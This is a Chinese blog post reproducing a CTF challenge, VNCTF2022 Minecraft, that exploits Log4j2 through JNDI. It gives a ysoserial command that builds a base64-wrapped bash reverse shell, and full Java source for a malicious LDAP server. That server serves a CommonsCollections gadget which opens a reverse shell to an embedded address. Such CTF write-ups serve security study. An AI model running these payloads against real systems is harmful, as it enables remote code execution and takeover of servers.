【Log4j2】VNCTF2022 misc-minecraft log4j反弹shell复现

已于 2022-04-25 17:03:37 修改
阅读量4.1k 收藏 2
点赞数 2
文章标签: intellij-idea java web安全 系统安全 安全
于 2022-04-25 17:01:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33834637/article/details/124409241
版权

##POC

hint
mc的flag在/flag

Misc mc :hint log4j jdk8u261

commons-collections-3.2.1.jar

使用ysoserial.jar生成反序列化数据

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}"|base64 -w 0

将得到的payload填入exp中
exp需要引用unboundid库

package com.company;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import com.unboundid.util.Base64;

import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.text.ParseException;

public class Main {
    private static final String LDAP_BASE = "dc=example,dc=com";

    public static void main(String[] args) {

        String url = "http://127.0.0.1:8001/#EvilObject";
        int port = 8001;

        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen",
                    InetAddress.getByName("0.0.0.0"),
                    port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url)));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port);
            ds.startListening();

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        /**
         *
         */
        public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }

        /**
         * {@inheritDoc}
         *
         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
         */

        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            } catch (Exception e1) {
                e1.printStackTrace();
            }

        }

        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e)
                throws LDAPException, MalformedURLException {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "Exploit");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if (refPos > 0) {
                cbstring = cbstring.substring(0, refPos);
            }

            // Payload1: 利用LDAP+Reference Factory
            // e.addAttribute("javaCodeBase", cbstring);
            // e.addAttribute("objectClass", "javaNamingReference");
            // e.addAttribute("javaFactory", this.codebase.getRef());

            // Payload2: 返回序列化Gadget
            try {
                e.addAttribute("javaSerializedData", Base64.decode(
                        "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHlNRGt1TVRReExqTXlMamMzTHpJek1qSXpJREErSmpFPX18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9dAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg="));
            } catch (ParseException exception) {
                exception.printStackTrace();
            }

            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

    }
}

minecraft服务器环境是1.12.1,下载进入
log4j的其他bypass格式之前写过 就不发了
请添加图片描述

请添加图片描述

##引用项目

https://github.com/frohoff/ysoserial
https://github.com/pingidentity/ldapsdk

参考

JNDI 注入利用 Bypass 高版本 JDK 限制:
http://wjlshare.com/archives/1661

shenghuo233
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Log4J2 靶场漏洞复现
weixin_47019868的博客
12-18 9869
北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228。相关地址NVD - CVE-2021-44228 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 在Kali系统
jaxen.jar和dom4j.jar
06-13
at org.dom4j.DocumentFactory.createXPath(DocumentFactory.java:230) at org.dom4j.tree.AbstractNode.createXPath(AbstractNode.java:207) at org.dom4j.tree.AbstractNode.selectSingleNode(AbstractNode....
VNCTF2022_Misc_复现
M3ng@L的博客
02-24 1762
VNCTF2022_Misc_复现 仔细找找 放大图片可以看见有很小的与周围颜色不同的像素点均匀的分布在图片中 先寻找像素点之间的间隔,然后拼接在一起生成新的图片 代码实现 from re import L from PIL import Image import numpy pic = Image.open("C:\\Users\\Menglin\\Desktop\\flag.png") # 寻找像素间隔 # array = numpy.array(pic) # print(array.shape[0
VNCTF2022公开赛-misc-仔细找找(复现
ookami6497的博客
03-12 879
放大发现里面大多数都是白点,而且还混有其他有颜色的点,前面地方能看出vn两个字母 参考这个大佬的博客说是要取出所有的杂色点 大佬的代码 from PIL import Image img = Image.open(r'g:\share\20220212\flag.png') w, h = img.size res = Image.new('RGB', (w//50, h//31), 255) for x in range(w): for y in range(h): ...
VNCTF 2022 misc复现
qq_74710163的博客
02-22 161
Strange flag prize wheel
[VNCTF2022]部分wp
Huamang的博客
02-23 652
VNCTF2022
leetcode2-Misc-4:杂项4
06-29
leetcode 2 杂项 4 问题 - 1 在线选举 () 问题 - 2 直方图中最大的矩形 ()
攻防世界János-the-Ripper,misc100
10-31
攻防世界János-the-Ripper,misc100。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127617765
opencagedata-misc-docs:OpenCage 使用的各种指南、更改日志、代码示例等
07-24
opencagedata-misc-docs OpenCage GmbH 使用的各种指南和文档。 托管在这里以使更改日志透明。 谁是 OpenCage 有限公司? 我们运行 。 了解更多。 我们还运行 ,这是一系列针对基于位置的服务创建者的定期聚会,...
golang-misc-1.9.2-4.el7.noarch.rpm
12-14
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4348
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
log4j详解
mczhu2的专栏
07-29 248
简介     简单的说log4j就是帮助开发人员进行日志输出管理的API类库。它最重要的特点就可以配置文件灵活的设置 日志信息的优先级、日志信息的输出目的地以及日志信息的输出格式。     Log4j除了可以记录程序运行日志信息外还有一重要的功能就是用来 显示调试信息。程序员经常会遇到脱离java ide环境调试程序的情况,这时大多数人会选择使用System.out.pri
JAVA漏洞log4j | 我的世界遭黑客袭击
Xunlan_博客
12-13 6814
我的世界java版服务端、客户端存在安全隐患。 漏洞利用log4j2在打印日志时会自动将形如${...}的文本替换为功能文本发送恶意链接。
ctfshow-Log4j复现-log4j复现
wrypot的博客
08-21 658
另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令。1、买VPS,打开mobax进行ssh连接,开两个终端。
VNCTF2022的wp
sln_1550的博客
02-14 1131
排名第6,逆向没有AK,差一题(要不然就第二了),不过发现自己的不足也算是有进步。 CRYPTO: ezmath n取到直接乘4返回即可 MISC 问卷 略 仔细找找 图片中有间隔几乎相等的杂色点,写脚本取出: from PIL import Image img = Image.open(r'g:\share\20220212\flag.png') w, h = img.size res = Image.new('RGB', (w//50, h//31), 255) for x in range(w)
ctfshow log4j复现 wp|CVE-2021-44228
spring!
03-24 4357
ctfshow log4j复现 wp|CVE-2021-44228
log4j.properties
一切都会好起来的,即使不在今天
08-27 412
### 设置### log4j.rootLogger=DEBUG,stdout,E log4j.logger.io.netty=WARN log4j.logger.com.mchange=WARN ### 输出信息到控制抬 ### log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.Target=...
[Log4j]CVE-2021-44228 CTFshow
krysyal的博客
03-31 3539
Log4j复现 CTFshow 复现参考文档1 复现参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
vnctf2022复现
weixin_45805993的博客
05-28 454
eazyjava file协议读url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes 有用的class //HelloWorldServlet.class package servlet; import entity.User; import java.io.IOException; import java.util.Base64; import java.util.Base64.Decoder; import javax.servlet.
攻防世界 misc 4-1
最新发布
09-13
攻防世界的misc 4-1题目需要进行一些步骤和操作来解决。首先,我们需要前往题目链接。在这个链接中,我们可以找到题目的详细描述和要求。根据题目要求,我们需要使用binwalk工具进行分析。binwalk是一个用于分析二进制文件的工具,可以用于提取其中的隐藏信息。接下来,我们可以根据保存的requirements.txt文件来安装所需的依赖库,例如opencv-python和matplotlib。这些库将在我们后续的操作中用到。完成这些准备工作后,我们可以根据题目的要求和提示来进一步解题。具体的解题步骤和方法,可以参考攻防世界misc2-1杂项的详细解题博客。这篇博客中提供了对misc2-1题目的详细解析和操作步骤,对于解答misc 4-1题目也是有帮助的。希望以上信息对您有所帮助。如果还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值